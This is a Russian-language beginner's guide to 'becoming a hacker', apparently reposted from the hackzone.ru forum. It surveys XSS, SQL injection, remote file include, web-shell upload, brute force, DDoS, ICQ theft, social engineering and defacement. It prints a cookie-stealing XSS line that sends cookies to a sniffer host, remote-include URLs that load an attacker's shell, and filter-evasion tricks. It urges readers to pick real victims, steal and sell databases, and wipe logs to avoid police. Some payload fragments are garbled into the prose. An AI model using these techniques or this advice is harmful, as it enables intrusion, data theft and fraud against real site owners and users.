Статья: Как стать хакером
Источник: http://www.hackzone.ru/
Источник: http://www.hackzone.ru/
Данная статья написана для того чтобы облегчить жизнь и счета за траффик мемберов hackzone.ru и попытаться ответить на первый вопрос многих вошедших впервые в сеть - КАК СТАТЬ ХАКЕРОМ? Примечание: сам автор статьи не является высококвалифицированным хакером, так что не думайте, что это понты :)++
Кстати статья не перелизана и не переделана. Мнение автора может не совпадать с вашим. Статья не полная. Позже будут обьеснены другие аспекты, но уже в других статьях или эти же аспекты, но более подробно.
Глава №1: С чего начать?
Прежде чем начнём давай условимся, что я не буду расказывать тебе как проводить инъекции, искать и реализовывать xss и прочую лабуду ( нет, ну конечно некоторые аспекты не повредят юному мозгу), я просто наставлю тебя на путь истинный. Итак, начнём!
Как выбрать OS? Многие говорят, что хакеры сидят только под UNIX, не верь,большинство авторов этих лживых постов ютят у себя на винте ВЫНЬ. Операционная система должна соответствовать твоим требованиям. Только не надо сейчас бежать в магазин за диском со свежайшим дистрибутивом пингвина( LINUX ) или демона( FreeBSD ) или фуги (OpenBSD ). OS UNIX очень сложна. Конечно нынешние дистрибутивы UNIX похожи на окна, но всё же. Килобайты команд надо держать у себя в голове и постоянно долбить по клавишам, одновременно смотря на чёрный как моя кошка терминал! Тебе это надо? Спорю на что угодно, что за первый день своего пребывания в Unix ты не сможешь подключить интернет! А в винде всё просто! И только истинные ламеры где то услышав громкие лозунги тупо выкрикивают, что Винда самая глючная система в мире, что его заколебали вирусы и ошибки. Нет респекта этим людям, не потому, что они выбирают ЛИНУКС, а потому, что они повторяют эту бессмыслицу. Вот главное отличие хакера, он должен быть уникален по своему, у каждого должна быть своя феня. Кстати у меня очень редко виснет Винда, а последний вирус я не помню когда поймал! В Винде очень много программ. Это отличная среда разработки, хотя некоторые языки зарождались в недрах линукс. В вопросах с безопасностью конечно рулят Никсы. Нет, ну конечно же там есть вирусы, но их очень мало. Почему? Потому, что нету смысла.С правами nobody ты вряд ли, что-нибудь сделаешь.Конечно же есть некоторые способы получения привелегий на тачке, разумеется через дыры в продуктах (нет,не в продуктах питания, а в самой системе и прогах.Кстати в сыре тоже есть дыры, а в бублике вообще огромная дыра, но вряд ли её когда нибудь залатают):).
Ну а если хочешь убить двух зайцев сразу советую испоьзовать виртуальные машины, н-р: VMWare, virtual PC от M$. Но помни, если погонишься за двумя зайцами сразу получишь люлей от лесника. Поставленная виртуалка будет жутко тормозить даже на нормальной тачке. Кстать Веб Мани под VMWare не пашутЪ ( об этом отдельная статья взятаю у Криса Касперски, о том как WebMoney Keeper Classic выдаёт очень много инфы в сеть, может стать даже трояном с которым ты подписал лицензионое соглашение:)!
Глава №2:
Весьма странный вопрос я считаю:" какие языки нужно учить, чтобы стать хакером?". Отвечаю:" какие языки нужно учить чтобы стать хакером я не знаю, но хорошие разумеется перечислю со всеми их возможностями: C,C#,C++ - это супермощная среда разработки под все платформы, эксплойты пишутся чаще на них, ООП это круто.
(об эксплойтах мы поговорим позже ) , Visual Basic - самый медленный после Java язык, но чаще всего на нём пишуться вирусы, Java - я не уверен, что тебе это надо, Delphi,Pascal - мощная среда для разработки программ, маленьких и быстрых, кто-то говорит, что маленьких программ на Дельфине не бывает тот не прав, сейчас Дельфи единственный конкурирующий с C++,C язык ( хотя мы с тобой знаем, что С++ лучше ), Assembler - О, да, АSM - это тяжёлая артилерия для всего угодно ( сплойтов, программ, вирусов ), Perl - непохой язык, появилось множество уязвимостей в скриптах из-за ошибок разработчиков, PHP - схожий по синтаксису с СИ язык, идеально подходит для многих целей ( Для разработки под ВЕБ) н-р: скрипты, эксплойты, работа с БД, рисование и т.д., SQL - очень нужен в нашей профессии для того чтобы составлять запросы к мускулу для выуживания БД (баз данных) ( учить весь язык замучаешься, лучше почитать парочку статей по основным запросам ). Здесь я не привёл ещё много языков которые устарели или не актуальны ( н-р: JavaScript ну на кой он тебе нужен, чтобы куки выуживать?, Lisp, Ada )!
Глава №3: Категории атак.
Идём всё ближе к цели!
1. XSS - наверное все слышали про Cross Site Scripting ( помоему переводится как "внедрение кодав страницу" ). Что можно поднять с помошью Xss спросишь ты? Поднять можно куки (cookie - печенье).
Зачем они нужны? С помощью кукисов ты идентифицируешься на сайте, т.е. в них хранится инфа о пользователе для сайта. Куки передаются методами POST and GET. Xss бывают активные, пассивные, полуактивные, нестандартные. В этой главе мы рассмотрим только нестандартные и простые X$$!
document.images[0].src="http://адрес снифера/s.gif"+document.cookieПростые - это что-то типа этого ""(писать без кавычек)
Но не всегда присутствует эта уязвимость на сайтах. Есть ещё несколько подводных камней - это фильтрация символов,
alert(document.cookie)браузер жертвы, интелект админа! Н-р: я однажды нашёл одну xss-ky , вбиваю и
мне выплёвывают мои куки ( это было в IE 6 ), захожу в Opera 8 нифига не пашет!
Фильтрация это вообще неприятная вешь, парсеры фильтруют знаки такие как (< >,/,+,|,пробел,$,',",; иногда () ).
Вот сим-таблица -
Сим ; / ? : @ = & < > " #
Код %3b %2f %3f %3a %40 %3d %26 %3c %3e %22 %23
Сим { } | \ ^ ~ [ ] ` % '
Код %7b %7d %7c %5c %5e %7e %5b %5d %60 %25 %27
2. SQL-Injection - самый популярный вид атаки о котором все слышали. Вы спросите почему Скуль- ИНЪЕКЦИЯ.
Инъекция - это внедрение препарата во что-нибудь, также и здесь, мы внедряем запросы в базу и получаем что хотим. Об инъекциях ты можешЪ почитать в соседней статье. Но вообще БД это лакомый кусок для хакера, в конце концов их можно продать. Очень высоко ценятся банковские базы, базы онлайн обменников. Вы спросите для чего они нужны покупателям - это же элементарно, в них хранятся мэйлы, логины, пароли, адреса, аськи, телефоны, пин-коды.
Но насчёт паролей обольщаться не стоит, в большинстве случаев они зашифрованы (нет не симкой:).
3. Google Hack - это поиск уязвимостей через самый крутой поисковик в мире - GOOGLE.COM,RU,KZ:)!
Подробнее прочитай мою статью про Google Hack!
4.DDoS - наверное ты не раз мечтал положить сайт неприятеля Васи Пупкина, чтобы тот очнулся только через дней пять.
ДДоС - это отправка пакетов на сайт ( то есть флужения ). Для организации ДДоС-а у тебя должна быть своя бот-сеть.
Бот-сеть образуется из компов захваченных тобою и находящихся под твоим надзором - своеобразные зомби.
Без бот сети, у тебя вряд ли что получится.
5. Include - способ хороший, но не всегда прёт. Способ банально прост, благоаря ошбкам програмиста у тебя появляется шанс
залить свой файл на сервант (сервер).
Вот некоторые примеры - http://la-la.fuck/index.pl?file="http://your_site/shell.php,txt,pl"(ага)
la-la.ru/lox.pl?open="/index.html,pl,php"
Хитрости: например хитрые администраторы ставят редиректы ( перенаправление на другую страницу )
Н-р: http://site1/link.php?u=la-la.ru - вот редирект
С помощью этого бага можно провернуть и Xss и Include.
Н-р: http://site1/link.php?u= <scri
pt%3Ealert(document.cookie)%3C
http://site1/link.php?u=http://la-la.ru/shell - без указания расширения, а то парсер запалит.
Ещё есть такой прикол как обход фильтра по расширению. Бывает что на сервер позволяют залить некий файл, картинку, без разницы, но с особым разрешением GIF,JPG и т.д. Бывает, что фильтрации вообще нет:). А если есть? Тогда методы наши будут хитрее. Мы сменим разрешение так "myfile.jpg.php", хотя я сомневаюсь, что данный метод будет работать, потому-что парсеры стали намного умнее. Ты конечно понял, что никаких картинок мы качать не будем, а зальём полноценный веб шелл или ещё какую-нибудь штучку. Шелл лучше брать от ныне закрывшейся или переехавшей ныне команды RST. По крайней мере rst.void.ru больше нету, а жалко, клёвая была группа, а какие эксплойты, загляденье. Но взять очень клёвый шелл можно по адресу с моего сайта scooterstar.narod.ru/shell.txt (расширение txt можно убрать:). Там кроме этого ничего нет, не бойся это не вирус, а если антивирус будет на него ругаться не бойся, вирусов с расширением txt я ещё не видел. Кстати, ты спросишь как шелл запустится на сервере? Отвечаю:" Он написан на языке перл, перл - это интерпритатор ( так вроде:), эксплойт запустится сам, только укажи путь к интерпритатору, н-р: !usr/bin/perl, в Выне адрес и perl.exe.
7.Бруфорс - брутфорс (от лат. "Грубая сила") это банальный подбор паролей по словарюк различным сервисам, не ко всем.
Хорошие брутфорсы - это Brutus или THC Hydra for Windows and UNIX.
8.ICQ Hacking - тебе никогда не хотелось иметь красивый номерок Аськи ( я думаю ты знаешь, что это )?
Вот мне лично нет. Но тебя я посвящу. У меня было пара шестизнаков, но их потом вернули обратно и владельцам. Ирония судьбы, но это так. Лучший способ получить красивый UIN - это купить его, а что, пусть дорого, но законно. Ладно если у тебя нету лишних маней гляди сюда. Второй лучший способ после купли аськи - это брут асек.
Третий способ, на многих форумах или сайтах делают конкурсы, победителю - аська. Продвинутый гигант по
ICQ Hacking это софтина ICQ Tools! Точно не знаю где её взять, но точно помню, что с её помощью я заполучил свой первый шестизнак.
Другой, более грубый способ - это взлом Шопов барыгующих UIN-ами с помощью способов приветённых выше или ниже.
9.Протроянивание, впаривание вирусов - способ ужасно грубый, так что мы его рассматривать не будем.
Думаю многие из нас ловили вирусы! Мне за компьютер обидно, он ведь по своему тоже живой:) Вот тебе понравится если в твою задницу засунут червяка:) Я уже про BackDoor (тайная лазейка) не говорю:)
10.Си - нет это не C#, C++(forever),C - это социальная инженерия, способность манипулировать людьми.
СИ в сети заниматься значительно легче чем в реале. Почему? Глупый вопрос, в интернете жертва не слышит твой голос не видит твоего лица, не знает сколько тебе лет. Разговор по той же Аське значительно легче, чем в реальной жизни, согласись. Например Кевин Митник прекрасно владел СИ и постоянно дурил крупные компании. Ты конечно же наслышан про Митника.
11.Кидалово - во преки всем матам в мою сторону я считаю, что кидалово тоже вид хаКа. Ведь там задействована СИ и много других аспектов. Сам я не кидала, не подумай чего. Есть падонки которые кидают нормальных людей на очень большие
деньги, н-р: Джакс, если хочешь глянуть не в списке кидал ли твой партнёр глянь на kidala.info. Обычно конечно кидают лохов, которые в первый раз сели за компьютер.
12. Взлом мэйла - самый помоему желанный метод для многих новичков. Есть несколько способов вхлома мэйла - это брутфорс (в интернете полно программ для взлома ящиков под разные OS).
Сейчас мы прошли некоторые аспекты, хотя не все, следовало бы обратиться к вардрайвингу, крэкингу, фрикингу, кардингу, NetWork Hacking, Kernel Hack, разное прикольное западло и ещё много-много всего. Позже я обязательно об этом напишу. Статья ещё не закончилась, так что читай дальше.
Deface - очень прикольная вешь. С дефейса практически ничего нельзя поднять кроме мести админу сайта.
В чём суть дефейса? Ты находишь уязвимость в сайте или получаешь доступ к админке и заливаешь на главную страницу картинку или прикольный текст (что хочешь), можно вообще стереть index.html, php,pl.
Вообще вешь прикольная, только сдесь надо знать либо html либо JavaScript.
Глава №4: Безопасность.
Ты думаешь, что за взломы тебе ничего не светит? Ошибаешься, глянь на Митника, МакКиннона.
Митнику хотели приписать 300 лет тюрьмы, а МакКиннону присваивают 60:)
Что главное для хакера, правильно - Анонимность в сети.
Рассмотрим некоторые из них.
Proxy - крайне небезопасный способ в последнее время. Почему? Да потому, что я на 80% уверен, что ты пользуешься халявными проксиками, а многие из них как извесно находятся под наблюдением правоохранительных органов или мертвы.
Лучше пользоваться цепочкой прокси, так надёжнее и выгоднее.
VpN - дороговатое удовольсвие но весьма эффективное. Это сервер почти полностью отданый под твоё распоряжение.
Анонимайзеры - признаюсь честно, я им не доверяю, очень тормознуто работают, если хочешь попробовать гляди у SpiderWebb-a в личке сайт или в google.ru(forever).
Некоторые советы: храни файлы и запускай брутфорсы и прочую лабуду на webshell-ах. Н-р: www.freeshell.org - крайне хороший сервис регистрация через telnet, ОСъ NetBSD 4.0, море утилит, срок действия шелла 90 дней.
Веб шелл это своеобразный VPN, хранилище файлов, безопасный запуск программ и анонимная закачка шеллов.
Регулярно чисти History и кэш в браузере.
Чисти логи с помошью утилиты Vanish (под Линукс).
Установи нормальный firewall and antivirus, хоть ты и начинающий хакер, но тебе не понравится если к тебе червяки полезут. На брандмауэр Винды не обращай внимание, он ничего не умеет, кроме как блокировка, разблокировка программ и игрушек, которые приходится каждый день разблокировывать. (прикольная скороговорка:)
Глава №5: Литература - очень знойный вопрос для всех. Вы думаете, что прочитав книжку от неизвестного автора - "Как стать хакером" всему научитесь и будете взламывать серверы NASA and FBI. Ещё чего, если бы всё было так, то от их серваков не осталось бы даже пепла:) Помни, что авторы таких книжек зарабатывают на названии. Доказано, что 70% покупателей книжек смотрят на название, а не на содержание текста. Тем самым становится всё выгоднее писателям, которые выбрали этот брэнд. Насчёт языков програмирования безспорно рулят Буки (books - книги). Плюс неплохо бы тебе хорошо освоить винду. Да, я знаю что ты уже познал все окна и тебе это не нужно. Ошибаешься, несмотря на свою простоту, разобраться с Виндой подчас сложновато. Особенно с некоторыми встроенными прогами.
Разве ты не мечтал написать СВОЙ убийственный вирус или эксплойт под новую Висту. Познай ядро, реестр и ещё туеву хучу модулей, узнай как внедрять код в процессы, ну конечно нужно знать Ассемблер+Visual_Basic+C#,C+модули_ под_них+Библиотеки и т.д. Короче, на начальном этапе тебе нечего забивать голову всякой фигнёй, как например "Библия хакера 2" ( не первая, первая от Криса Касперски обалденная вещь ). Книга была актуальна года четыре назад.
Читай статьи от авторитетных хакеров Крис Касперски, ЗАРАЗА, Terabyte, Coban2k ( автор Пинча ).
Так же не забывай почитывать свежие статейки на форуме и bugtrack-rss-лентах hackzone.ru,
спрашивай совета от мемберов хакзоны, не стесняйся, мы злые только тогда, если поступают тупые вопросы
н-р: если можно, взломайте тот-то сайт, пожалуйста. Помни друг, что спасибо в карман не положишь, на хлеб не намажешь и пива "Пожалуйста" нет. Но ты же не такой как все ( смотри первую главу ).
Совет: никогда не читай журнал "Хакер"(почему? Не читай и всё! Это журнал не от истинных хакеров, все статьи там пишутся за деньги, поэтому не могут быть правдивыми или хорошими, единственные кого я уважаю в "Хакере" - это Даня Шеповалов(ныне работающий в журнале про звёзд Bravo), Gorlum - его статьи про С++ меня часто выручали, Крис Касперски - обалденный эксперт знающий очень много про Юникс и Виндовс, знает очень много языков програмирования.).
Совет 2: Читай истинно хакерские E-zine н-р: xaoc, Defaced, Xakery Ezine, Codepimps, Mazafaka, Infected Voice.
Не ленись узнавай аськи у мемберов hackzone.ru, только слишком не приставай, а то пустят в игнор.
Главу Style, Soft я пропущу так как выбирать софт и свой стиль только тебе ( первая глава ).
Глава №6: Объекты для атаки.
Так, прочитав эту статью ты наверное будешь думать, что-бы взломать.
СОВЕТ: Попробуй обратиться к google.ru (глянь в статье GOOGLE Hack) поищи жертв и потренируйся.
Тырани пару баз. Только не забывай об анонимности, не редко спец службы ставят западню на таких сайтах.
Кстати, я тебе не объяснил, что такое эксплойт (сплойт) - эксплойт это прога (скрипт), написанный чаще всего на C++(forever),
помогающая получить доступ на тачку. Разумеется, под отдельные версии ОСИ или Программ отдельные эксплойты, потому что баги латают( придумывают патчи(заплатки) ).
Статья не полная. Я просто не хотел печатать книгу. Если что, я буду писать другие статьи про РЕал-кардинг, крэкинг, фрикинг, пранк:). Будут вопросы стучи в асю или на мыло. То и другое можно узнать на hackzone.ru в личке. Надеюсь эта статья развеяла все твои иллюзии по поводу хакерства и убедила, что это не так то просто как кажется. Мнение автора не всегда совпаает с мнением читателя!